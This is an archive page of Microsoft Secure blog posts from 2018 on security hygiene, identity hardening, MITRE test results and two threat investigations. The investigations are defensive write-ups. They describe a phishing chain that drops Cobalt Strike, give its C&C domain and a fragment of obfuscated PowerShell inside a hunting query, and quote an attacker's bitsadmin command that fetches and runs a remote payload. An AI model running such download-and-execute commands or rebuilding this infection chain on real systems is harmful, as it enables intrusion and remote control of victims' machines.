Archive for the ‘cybersecurity’ Category

CISO series: Strengthen your organizational immune system with cybersecurity hygiene

December 6th, 2018 No comments

One of the things I love about my job is the time I get to spend with security professionals, learning firsthand about the challenges of managing security strategy and implementation day to day. There are certain themes that come up over and over in these conversations. My colleague Ken Malcolmson and I discussed a few of them on the inaugural episode of the Microsoft CISO Spotlight Series: CISO Lessons Learned. Specifically, we talked about the challenges CISOs face migrating to the cloud and protecting your organizations data. In this blog, I dig into one of the core concepts we talked about: practicing cybersecurity hygiene.

Hygiene means conditions or practices conducive to maintaining health. Cybersecurity hygiene is about maintaining cyberhealth by developing and implementing a set of tools, policies, and practices to increase your organization’s resiliency in the face of attacks and exploits. Healthy habits like drinking lots of water, walking every day, and eating a rainbow of vegetables build up the immune system, so our bodies can fight off viruses with minimal downtime. Most of the time we dont even realize how powerful the protection of these behaviors are until that day deep in January when you look around your office and realize you are one of the only people who isnt sick. Thats what cybersecurity hygiene does; it strengthens your organizational immune system. Its a simple concept until you start thinking about the last time you resolved to start practicing healthy habits but were skipping the salad by day three because big salads make your stomach bloat and youd rather have a candy bar anyway.

Success starts with strategy

No matter where in the world I am, CSOs and CISOs tell me their days are filled with fire drills and crises that consume attention and resources but dont help advance a strategic agenda. A little like that candy bardrawing focus in the present but diverting energy from long-term goals. In the precious moments of downtime, when cyber executives can turn attention to long-term strategy and proactive security measures, its not uncommon to have those goals diverted in a different waychasing the latest trend that the board is excited about or having to react to failure or a finding from a recent security assessment.

Consistent change changes systems

Our bodies are systemswhen we eat more vegetables our microbiome changes, it becomes easier to digest those veggies and can actually begin craving them. But if you stock the pantry with candy instead of leafy greens, its hard to make a consistent change. For cyberhealth, you need a strategy that works with the strengths of your organization and mitigates its weakness. Its a little like planning to be healthy. If you are social, it can help to enlist a friend in your exercise routine. If you work late, you can buy prepared, healthy food, so you arent as tempted to grab that candy bar after a long day.

To implement good security practices, take some time to understand your budget, your priorities, and your greatest vulnerabilities and allocate your money appropriately. Create strategic cybersecurity targets and goals for the next one, three, and five years and engage the C-Suite and board in the approvals. You will feel more empowered in conversations with the C-Suite when you have a good rationale and a solid plan and when cybersecurity hygiene becomes a systemic part of the organization, the healthy system will start to crave it.

Practice good cybersecurity hygiene

Once you have a strategy, you are ready to institute some best practices. We recommend getting started with the following to all our clients, big and small:

  • Back up data: Make sure you have a regular process to back up your data to a location separate from your production data and encrypt it in transit and at rest.
  • Implement identities: A good identity and access management solution allows you to enable a single common identity across on-premises and cloud resources with added safeguards to protect your most privileged accounts.
  • Deploy conditional access: Use conditional access to control access based on location, device, or other risk factors.
  • Use Multi-Factor Authentication: Multi-Factor Authentication works on its own or in conjunction with conditional access to verify that users trying to access your resources are who they say they are.
  • Patching: A strategy to ensure all of your software and hardware is regularly patched and updated is important to reduce the number of security vulnerabilities that a hacker can exploit.

Develop cybersecurity hygiene with industry security frameworks

Excited to build healthy cyber habits but not sure where to start? The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a great place to start. You can also download blueprints that will help you implement Microsoft Azure according to NIST standards.

The Center for Information Security (CIS) is a non-profit organization that helps organizations protect themselves from cybercrime. Review the CIS Microsoft Azure Foundations benchmark, which provides recommended steps to securely implement Azure.

Stay healthy, eat your cyber vegetables, and stay up to date by watching our Microsoft CISO Spotlight Series: CISO Lessons Learned, and your organization can build the resiliency to take on any threat.

The post CISO series: Strengthen your organizational immune system with cybersecurity hygiene appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Step 1. Identify users: top 10 actions to secure your environment

December 5th, 2018 No comments

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. Well provide advice on activities such as setting up identity management through active directory, malware protection, and more. In this post, we explain how to create a single common identity across on-premises and cloud with hybrid authentication.

Establishing a single, common identity for each user is the foundations step to your cybersecurity strategy. If you currently have an on-premises footprint, this means connecting your Azure Active Directory (Azure AD) to your on-premises resources. There are various requirements and circumstances that will influence the hybrid identity and authentication method that you choose, but whether you choose federation or cloud authentication, there are important security implications for each that you should consider. This blog walks you through our recommended security best practices for each hybrid identity method.

Set up password hash synchronization as your primary authentication method when possible

Azure AD Connect allows your users to access on-premises resources including Azure, Office 365, and Azure AD-integrated SaaS apps using one identity. It uses your on-premises Active Directory as the authority, so you can use your own password policy, and Azure AD Connect gives you visibility into the types of apps and identities that are accessing your company resources. If you choose Azure AD Connect, Microsoft recommends that you enable password hash synchronization (Figure 1) as your primary authentication method. Password hash synchronization synchronizes the password hash in your on-premises Active Directory to Azure AD. It authenticates in the cloud with no on-premises dependency, simplifying your deployment process. It also allows you to take advantage of Azure AD Identity Protection, which will alert you if any of the usernames and passwords in your organization have been sold on the dark web.

Figure 1. Password hash sync synchronizes the password hash in your on-premises Active Directory to Azure AD.

Enable password hash synchronization as a backup during on-premises outages

If your authentication requirements are not natively supported by password hash synchronization, another option available through Azure AD Connect is pass-through authentication (Figure 2). Pass-through authentication provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. Since pass-through authentication relies on your on-premises infrastructure, your users could lose access to both Active Directory-connected cloud resources and on-premises resources if your on-premises environment goes down. To limit user downtime and loss of productivity, we recommend that you configure password hash synchronization as a backup. This allows your users to sign in and access cloud resources during an on-premises outage. It also gives you access to advanced security features, like Azure Directory Identity Protection.

Figure 2. Pass-through authentication provides a simple password validation for Azure AD authentication services.

Whether you implement password hash synchronization as your primary authentication method or as a backup during on-premises outages, you can use the Active Directory Federation Services (AD FS) to password hash sync deployment plan as a step-by-step guide to walk you through the implementation process.

Implement extranet lockout if you use AD FS

AD FS may be the right choice if your organization requires on-premises authentication or if you are already invested in federation services (Figure 3). Federation services authenticates users and connects to the cloud using an on-premises footprint that may require several servers. To ensure your users and data are as secure as possible, we recommend two additional steps.

First, enable password hash synchronization as a backup authentication method to get access to Azure AD Identity Protection and minimize interruptions if an outage should occur. Second, we recommend you implement extranet lockout. Extranet lockout protects against brute force attacks that target AD FS, while preventing users from being locked out of Active Directory. If you are using AD FS running on Windows Server 2016, set up extranet smart lockout. For AD FS running on Windows Server 2012 R2AD, youll need to turn on extranet lockout protection.

Figure 3. Federation services authenticates users and connects to the cloud using an on-premises footprint.

You can use the AD FS to pass-through authentication deployment plan as a step-by-step guide to walk you through the implementation process.

Learn more

Check back in a few weeks for our next blog post, Step 2. Manage authentication and safeguard access. In this post well dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.


The post Step 1. Identify users: top 10 actions to secure your environment appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP

In MITREs evaluation of endpoint detection and response solutions, Windows Defender Advanced Threat Protection demonstrated industry-leading optics and detection capabilities. The breadth of telemetry, the strength of threat intelligence, and the advanced, automatic detection through machine learning, heuristics, and behavior monitoring delivered comprehensive coverage of attacker techniques across the entire attack chain.

MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also known as Boron or UPS). To isolate detection capabilities, as part of the testing, all protection and prevention features were turned off. In the case of Windows Defender ATP, this meant turning off blocking capabilities like hardware-based isolation, attack surface reduction, network protection, exploit protection, controlled folder access, and next-gen antivirus. The test showed that, by itself, Windows Defender ATPs EDR component is one of the most powerful detection and investigation solutions in the market today.

Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics. MITRE closely partnered with participating security vendors in designing and executing the evaluation, resulting in a very collaborative and productive testing process.
We like participating in scientific and impartial tests because we learn from them. Learning from independent tests, like listening to customers and conducting our own research, is part of our goal to make sure that Windows Defender ATP is always ahead of threats and continues to evolve.

Overall, the results of the MITRE evaluation validated our investments in continuously enriching Windows Defender ATPs capabilities to detect and expose attacker techniques. Below we highlight some of the acute attacker techniques that Windows Defender ATP effectively detected during the MITRE testing.

Deep security telemetry and comprehensive coverage

Windows Defender ATP showed exceptional capabilities for detecting attacker techniques through APT3s attack stages, registering the lowest number of misses among evaluated products. Throughout the emulated attack chain, Windows Defender ATP detected the most critical attacker techniques, including:

  • Multiple discovery techniques (detected with Suspicious sequence of exploration activities alert)
  • Multiple process injection attempts for privilege escalation, credential theft, and keylogging/screen capture
  • Rundll32.exe being used to execute malware
  • Credential dumping from LSASS
  • Persistence via Scheduled Task
  • Keylogging (both in Cobalt Strike and PS Empire)
  • Brute force login attempts
  • Accessibility features attack (abusing sticky keys)
  • Lateral movement via remote service registration

Windows Defender ATP correlates security signals across endpoints and identities. In the case of the APT3 emulation, signals from Azure Advanced Threat Protection helped expose and enrich the detection of the account discovery behavior. This validates the strategic approach behind Microsoft Threat Protection: the most comprehensive protection comes from sharing rich telemetry collected from across the entire attack chain.

Windows Defender ATPs Antimalware Scan Interface (AMSI) sensors also proved especially powerful, providing rich telemetry on the latter stages of the attack emulation, which made heavy use of malicious PowerShell scripts. This test highlighted the value of transparency: the AMSI interface enabled deep visibility into the PowerShell used in each attacker technique. Advanced machine learning-based detection capabilities in Windows Defender ATP use this visibility to expose malicious scripts.

Stopping attacks in the real world with Windows Defender ATPs unified endpoint security platform

The MITRE results represent EDR detection capabilities, which surface malicious and other anomalous activities. In actual customer environments, Windows Defender ATPs preventive capabilities, like attack surface reduction and next-gen protection capabilities, would have blocked many of the attack techniques at the onset. In addition, investigation and hunting capabilities enable security operations personnel to correlate alerts and incidents to enable holistic response actions and build wider protections.

Windows Defender ATP’s best-in-class detection capabilities, as affirmed by MITRE, is amplified across Microsoft solutions through Microsoft Threat Protection, a comprehensive, integrated protection for identities, endpoints, user data, cloud apps, and infrastructure. To run your own evaluation of how Windows Defender ATP can help protect your organization and let you detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.




Windows Defender ATP team




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.



The post Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP appeared first on Microsoft Secure.

Categories: APT3, ATT&CK, BORON, cybersecurity, MITRE Tags:

Kicking off the Microsoft Graph Security Hackathon

December 3rd, 2018 No comments

Cybersecurity is one of the hottest sectors in tech with Gartner predicting worldwide information security spending to reach $124 billion by the end of 2019. New startups and security solutions are coming onto the market while attackers continue to find new ways to breach systems. The security solutions market has grown at a rapid pace as a result. Our customers face immense challenges in integrating all these different solutions, tools, and intelligence. Oftentimes, the number of disconnected solutions make it more difficultrather than easierto defend and recover from attacks.

We invite you to participate in the Microsoft Graph Security Hackathon for a chance to help solve this pressing challenge and win a piece of the $15,000 cash prize pool.* This online hackathon runs from December 1, 2018 to March 1, 2019 and is open to individuals, teams, and organizations globally.

The Microsoft Graph Security API offers a unified REST endpoint that makes it easy for developers to bring security solutions together to streamline security operations and improve cyber defenses and response. Tap into other Microsoft Graph APIs as well as mash up data and APIs from other sources to extend or enrich your scenarios.


In addition to learning more about the Microsoft Graph and the security API, the hackathon offers these awesome prizes for the top projects:

  • $10,000 cash prize for the first-place solution, plus a speaking opportunity at Build 2019.
  • $3,000 cash prize for the runner up solution.
  • $2,000 cash prize for the popular choice solution, chosen via public voting.

In addition, all three winning projects, and the individuals or teams in the categories above, will be widely promoted on Microsoft blog channelsgiving you the opportunity for your creative solutions to be known to the masses. The criteria for the judging will consist of the quality of the idea, value to the enterprise, and technical implementation. You can find all the details you need on the Microsoft Graph Security Hackathon website.

Judging panel

Once the hackathon ends on March 1, 2019, judging commences immediately after by our amazing judges. Well announce the winners on or before April 1, 2019. The hackathon will be judged by a panel of Microsoft and non-Microsoft experts and influencers in the developer community and in cybersecurity, including:

  • Ann Johnson, Corporate Vice President for Cybersecurity Solutions Group for Microsoft
  • Scott Hanselman, Partner Program Manager for Microsoft
  • Mark Russinovich, CTO Azure for Microsoft
  • Rick Howard, Chief Security Officer Palo Alto Networks

We will announce more judges in the coming weeks!

Next steps

Let the #graphsecurityhackathon begin

*No purchase necessary. Open only to new and existing Devpost users who are the age of majority in their country. Game ends March 1, 2019 at 5:00 PM Eastern Time. For details, see the official rules.

The post Kicking off the Microsoft Graph Security Hackathon appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers

December 3rd, 2018 No comments

Reuters recently reported a hacking campaign focused on a wide range of targets across the globe. In the days leading to the Reuters publication, Microsoft researchers were closely tracking the same campaign.

Our sensors revealed that the campaign primarily targeted public sector institutions and non-governmental organizations like think tanks and research centers, but also included educational institutions and private-sector corporations in the oil and gas, chemical, and hospitality industries.

Microsoft customers using the complete Microsoft Threat Protection solution were protected from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages. Office 365 Advanced Threat Protection caught the malicious URLs used in emails, driving the blocking of said emails, including first-seen samples. Meanwhile, numerous alerts in Windows Defender Advanced Threat Protection exposed the attacker techniques across the attack chain.

Third-party security researchers have attributed the attack to a threat actor named APT29 or CozyBear, which largely overlaps with the activity group that Microsoft calls YTTRIUM. While our fellow analysts make a compelling case, Microsoft does not yet believe that enough evidence exists to attribute this campaign to YTTRIUM.

Regardless, due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of the Defending Democracy Program, Microsoft encourages eligible organizations to participate in Microsoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats.

Attack overview

The aggressive campaign began early in the morning of Wednesday, November 14. The targeting appeared to focus on organizations that are involved with policy formulation and politics or have some influence in that area.

Phishing targets in different industry verticals

Although targets are distributed across the globe, majority are located in the United States, particularly in and around Washington, D.C. Other targets are in Europe, Hong Kong, India, and Canada.

Phishing targets in different locations

The spear-phishing emails mimicked sharing notifications from OneDrive and, as noted by Reuters, impersonated the identity of individuals working at the United States Department of State. If recipients clicked a link on the spear-phishing emails, they began an exploitation chain that resulted in the implantation of a DLL backdoor that gave the attackers remote access to the recipients machines.

Attack chain

Analysis of the campaign


The spear-phishing emails used in this attack resemble file-sharing notifications from OneDrive.

The emails contain a link to a legitimate, but compromised third-party website:

hxxps://[random string]

The random strings are likely used to identify distinct targeted individuals who clicked on the link. However, all observed variants of this link redirect to a specific link on the same site:


When users click the link, they are served a ZIP archive containing a malicious LNK file. All files in a given attack have the same file name, for example, ds7002.pdf,, and ds7002.lnk.


The LNK file represents the first stage of the attack. It executes an obfuscated PowerShell command that extracts a base64-encoded payload from within the LNK file itself, starting at offset 0x5e2be and extending 16,632 bytes.

Encoded content in the LNK file

The encoded payloadanother heavily obfuscated PowerShell scriptis decoded and executed:

Decoded second script

The second script carves out two additional resources from within the .LNK file:

  • ds7002.PDF (A decoy PDF)
  • cyzfc.dat (The first stage implant)

Command and control

The first-stage DLL, cyzfc.dat, is created by the PowerShell script in the path %AppData%\Local\cyzfc.dat. It is a 64-bit DLL that exports one function: PointFunctionCall.

The PowerShell script then executes cyzfc.dat by calling rundll32.exe. After connecting to the first-stage command-and-control server at pandorasong[.]com (, cyzfc.dat begins to install the final payload by taking the following actions:

  1. Allocate a ReadWrite page for the second-stage payload
  2. Extract the second-stage payload as a resource
  3. Take a header that is baked into the first payload with a size 0xEF bytes
  4. Concatenate the header with the resource, starting at byte 0x12A.
  5. De-XOR the second-stage payload with a rolling XOR (ROR1), starting from key 0xC5.

The second stage is an instance of Cobalt Strike, a commercially available penetration testing tool, which performs the following steps:

  1. Define a local named pipe with the format \\.\pipe\MSSE-<number>-server, where <number> is a random number between 0 and 9897
  2. Connecting to the pipe, write it global data with size 0x3FE00
  3. Implement a backdoor over the named pipe:

    1. Read from the pipe (maximum 0x3FE00 bytes) to an allocated buffer
    2. DeXOR the payload onto a new RW memory region, this time with a much simple XOR key: simple XORing every 4 bytes with 0x7CC2885F
    3. Turn the region to be RX
    4. Create a thread that starts running the payload’

The phase that writes to global data to the pipe actually writes a third payload. That payload is XORed with the same XORing algorithm used for reading. When decrypted, it forms a PE file with a Meterpreter header, interpreting instructions in the PE header and moving control to a reflective loader:

The third payload eventually gets loaded and connects to the command-and-control (C&C) server address that is baked-in inside configuration information in the PE file. This configuration information is de-XORed at the third payload runtime:

The configuration information itself mostly contains C&C information:

CobaltStrike is a feature-rich penetration testing tool that provides remote attackers with a wide range of capabilities, including escalating privileges, capturing user input, executing arbitrary commands through PowerShell or WMI, performing reconnaissance, communicating with C&C servers over various protocols, and downloading and installing additional malware.

End-to-end defense through Microsoft Threat Protection

Microsoft Threat Protection is a comprehensive solution for enterprise networks, protecting identities, endpoints, user data, cloud apps, and infrastructure. By integrating Microsoft services, Microsoft Threat Protection facilitates signal sharing and threat remediation across services. In this attack, Office 365 Advanced Threat Protection and Windows Defender Advanced Threat Protection quickly mitigated the threat at the onset through durable behavioral protections.

Office 365 ATP has enhanced phishing protection and coverage against new threats and polymorphic variants. Detonation systems in Office 365 ATP caught behavioral markers in links in the emails, allowing us to successfully block campaign emailsincluding first-seen samplesand protect targeted customers. Three existing behavioral-based detection algorithms quickly determined that the URLs were malicious. In addition, Office 365 ATP uses security signals from Windows Defender ATP, which had a durable behavior-based antivirus detection (Behavior:Win32/Atosev.gen!A) for the second-stage malware.If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

Safe Links protection in Office 365 ATP protects customers from attacks like this by analyzing unknown URLs when customers try to open them. Zero-hour Auto Purge (ZAP) actively removes emails post-delivery after they have been verified as maliciousthis is often critical in stopping attacks that weaponize embedded URLs after the emails are sent.

All of these protections and signals on the attack entry point are shared with the rest of the Microsoft Threat Protection components. Windows Defender ATP customers would see alerts related to the detection of the malicious emails by Office 365 ATP, as well the behavior-based antivirus detection.

Windows Defender ATP detects known filesystem and network artifacts associated with the attack. In addition, the actions of the LNK file are detected behaviorally. Alerts with the following titles are indicative of this attack activity:

  • Artifacts associated with an advanced threat detected
  • Network activity associated with an advanced threat detected
  • Low-reputation arbitrary code executed by signed executable
  • Suspicious LNK file opened

Network protection blocks connections to malicious domains and IP addresses. The following attack surface reduction rule also blocks malicious activities related to this attack:

  • Block executable files from running unless they meet a prevalence, age, or trusted list criteria

Through Windows Defender Security Center, security operations teams could investigate these alerts and pivot to machines, users, and the new Incidents view to trace the attack end-to-end. Automated investigation and response capabilities, threat analytics, as well as advanced hunting and new custom detections, empower security operations teams to defend their networks from this attack.To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

The following Advanced hunting query can help security operations teams search for any related activities within the network:

//Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

//Query 2: C&C connection
| where EventTime > ago(10d) 
| where RemoteUrl == "" 

//Query 3: Malicious PowerShell
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 
"-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0" 

//Query 4: Malicious domain in default browser commandline
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 

//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

The provided queries check events from the past ten days. Change EventTime to focus on a different period.




Windows Defender Research team, Microsoft Threat Intelligence Center, and Office 365 ATP research team




Indicators of attack

Files (SHA-1)

  • ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1
  • ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609
  • ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873
  • cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf


  • hxxps://www.jmj[.]com/personal/nauerthn_state_gov/VFVKRTdRSm

C&C servers

  • pandorasong[.]com ( (first-stage C&C server)




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.



The post Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers appeared first on Microsoft Secure.

Secure your privileged administrative accounts with a phased roadmap

November 29th, 2018 No comments

In my role, I often meet with CISOs and security architects who are updating their security strategy to meet the challenges of continuously evolving attacker techniques and cloud platforms. A frequent topic is prioritizing security for their highest value assets, both the assets that have the most business value today as well as the initiatives that the organization is banking on for the future. This typically includes intellectual property, customer data, key new digital initiatives, and other data that, if leaked, would do the greatest reputational and financial damage. Once weve identified the highest value assets, it inevitably leads to a conversation about all the privileged accounts that have administrative rights over these assets. Most of our customers recognize that you can no longer protect the enterprise just by securing the network edge; the cloud and mobile devices have permanently changed that. Identities represent the critically important new security perimeter in a dual perimeter strategy while legacy architectures are slowly phased out.

Regardless of perimeter and architecture, there are few things more important to a secure posture than protecting admins. This is because a compromised admin account would cause a much greater impact on the organization than a compromised non-privileged user account.

If you are working on initiatives to secure your privileged accounts (and I hope you are ), this post is designed to help. Ive shared some of the principles and tools that Microsoft has used to guide and enhance our own security posture, including some prescriptive roadmaps to help you plan your own initiatives.

Protect the privileged access lifecycle

Once you start cataloging all the high-value assets and who can impact them, it quickly becomes clear that we arent just talking about traditional IT admins when we talk about privileged accounts. There are people who manage social media accounts rich with customer data, cloud services admins, and those that manage directories or financial data. All of these user accounts need to be secured (though most organizations start with IT admins first and then progress to others, prioritized based on risk or the ability to secure the account quickly).

Protecting the privileged access lifecycle is also more than just vaulting the credentials. Organizations need to take a complete and thoughtful approach to isolate the organizations systems from risks. It requires changes to:

  • Processes, habits, administrative practices, and knowledge management.
  • Technical components such as host defenses, account protections, and identity management.

Principles of securing privileged access

Securing all aspects of the privileged lifecycle really comes down to the following principles:

  • Strengthen authentication:

    • Move beyond relying solely on passwords that are too often weak, or easily guessed and move to a password-less, Multi-Factor Authentication (MFA) solution that uses at least two forms of authentication, such as a PIN, biometrics, and/or a code generated by a device.
    • Make sure you detect and remediate leaked credentials.

  • Reduce the attack surface:

    • Remove legacy/insecure protocols.
    • Remove duplicate/weak passwords.
    • Reduce dependencies.

  • Increase monitoring and detection.
  • Automate threat response.
  • Ensure usability for administrators.

To illustrate the importance we place on privileged access controls, Ive included a diagram that shows how Microsoft protects itself. Youll see we have instituted traditional defenses for securing the network, as well as made extensive investments into development security, continuous monitoring, and processes to ensure we are looking at our systems with an attackers eye. You can also see how we place a very high priority on security for privileged users, with extensive training, rigorous processes, separate workstations, as well as strong authentication.

Prioritize quick, high-value changes first using our roadmap

To help our customers get the most protection for their investment of time/resources, we have created prescriptive roadmaps to kickstart your planning. These will help you plan out your initiatives in phases, so you can knock out quick wins first and then incrementally increase your security over time.

Check out the Azure Active Directory (Azure AD) roadmap to plan out protections for the administration of this critical system. We also have an on-premises roadmap focused on Active Directory admins, which Ive included below. Since many organizations run hybrid networks, we will soon merge these two roadmaps.

On-premises privileged identity roadmap

There are three stages to secure privileged access for an on-premises AD.

Stage 1 (30 days)

Stage 1 of the roadmap is focused on quickly mitigating the most frequently used attack techniques of credential theft and abuse.

1. Separate accounts: This is the first step to mitigate the risk of an internet attack (phishing attacks, web browsing) from impacting administrative privileges.

2 and 3. Unique passwords for workstations and servers: This is a critical containment step to protect against adversaries stealing and re-using password hashes for local admin accounts to gain access to other computers.

4. Privileged access workstations (PAW) stage 1: This reduces internet risks by ensuring that the workstations admins use every day are protected at a very high level.

5. Identity attack detection: Ensures that security operations have visibility into well-known attack techniques on admins.

Stage 2 (90 days)

These capabilities build on the mitigations from the 30-day plan and provide a broader spectrum of mitigations, including increased visibility and control of administrative rights.

1. Require Windows Hello for business: Replace hard-to-remember and easy-to-hack passwords with strong, easy-to-use authentication for your admins.

2. PAW stage 2: Requiring separate admin workstations significantly increases the security of the accounts your admins use to do their work. This makes it extremely difficult for adversaries to get access to your admins and is modeled on the systems we use to protect Azure and other sensitive systems at Microsoft (described earlier).

3. Just in time privileges: Lowers the exposure of privileges and increases visibility into privilege use by providing them to admins as they need it. This same principle is applied rigorously to admins of our cloud.

4. Enable credential guard on Windows 10 workstations: This isolates secrets for legacy authentication protocols like Kerberos and NTLM on all Windows 10 user workstations to make it more difficult for attackers to operate there and reach the admins.

5. Leaked credentials 1: This enables you to detect a risk of a leaked password by synchronizing password hashes to Azure AD where it can compare them to known leaked credentials.

6. Lateral movement vulnerability detection: Discover which sensitive accounts in your network are exposed because of their connection to non-sensitive accounts, groups, and machines.

Stage 3: Proactively secure posture

These capabilities build on the mitigations from previous phases and move your defenses into a proactive posture. While there will never be perfect security, this represents the strongest protections against privilege attacks currently known and available today.

1. Review role-based access control: Protect identity and management systems using a set of buffer zones between full control of the environment (Tier 0) and the high-risk workstation assets that attackers frequently compromise.

2. PAW stage 3: Expands your protection by separating internet risks (phishing attacks, web browsing) from all administrative privileges, not just AD admins.

3. Lowers the attack surface of domain and domain controller: This hardens these sensitive assets to make it difficult for attackers to compromise them with classic attacks like unpatched vulnerabilities and exploiting configuration weaknesses.

4. Leaked credentials 2: This steps up the protection of admin accounts against leaked credentials by forcing a reset of passwords using conditional access and self-service password reset (versus requiring someone to review the leaked credentials reports and manually take action).

Securing your administrative accounts will reduce your risk significantly. Stay tuned for the hybrid roadmap, which will be completed in early 2019.

The post Secure your privileged administrative accounts with a phased roadmap appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks

November 28th, 2018 No comments

Several weeks ago, the Windows Defender Advanced Threat Protection (Windows Defender ATP) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the new attack.

The attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.

With the high risk determined for affected machines, Conditional access blocked these machines access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.

Finally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer have foothold on affected machines, returning machines to normal working state. Once the threat is remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.

Investigating alert timelines and process trees

We discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office applications activity, dubious cross-process injections, and machine-learning-based indications of anomalous executions flows. The sheer volume and variety of the alerts told us something serious was going on.

Figure 1. Multiple alerts triggered by the attack

The first detection related to the attack was fired by a suspicious EQNEDT32.exe behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns.

Through the tight integration between Windows Defender ATP and Office 365 ATP, we were able to use Office 365 ATP Threat Explorer to find the specific emails that the attackers used to distribute the malicious document.

Using Windows Defender Security Center, we further investigated the detected executable and found that the attackers used bitsadmin.exe to download and execute a randomly named payload from a remote server:

bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe

Machine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used process hollowing to run code in a system process memory.

In some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATPs Antimalware Scan Interface (AMSI) sensor exposed all the attacker scripts, which we observed to be for meant mostly for data exfiltration.

Figure 2. Process tree

Using the timeline and process tree views in Windows Defender Security Center, were able to identity the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.

Figure 3. Campaign attack chain

Device risk calculation and incident prioritization

The alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines at the top of the queue, helping ensure security operations teams to immediately notice and prioritize. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in its lifespan.

In this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated based on the multiple component and multiple types of anomalous behaviors exhibited by an attack across the infection chain.

Windows Defender ATP-driven conditional access

When Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by Azure Active Directory.

This integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. Read more about Conditional access here.

Signal sharing and threat remediation across Microsoft Threat Protection

In this attack investigation, the integration of Windows Defender ATP and Office 365 ATP allowed us to trace the entry vector, and security operations teams can seamlessly pivot between the two services, enabling them to investigate the end-to-end timeline of an attack.

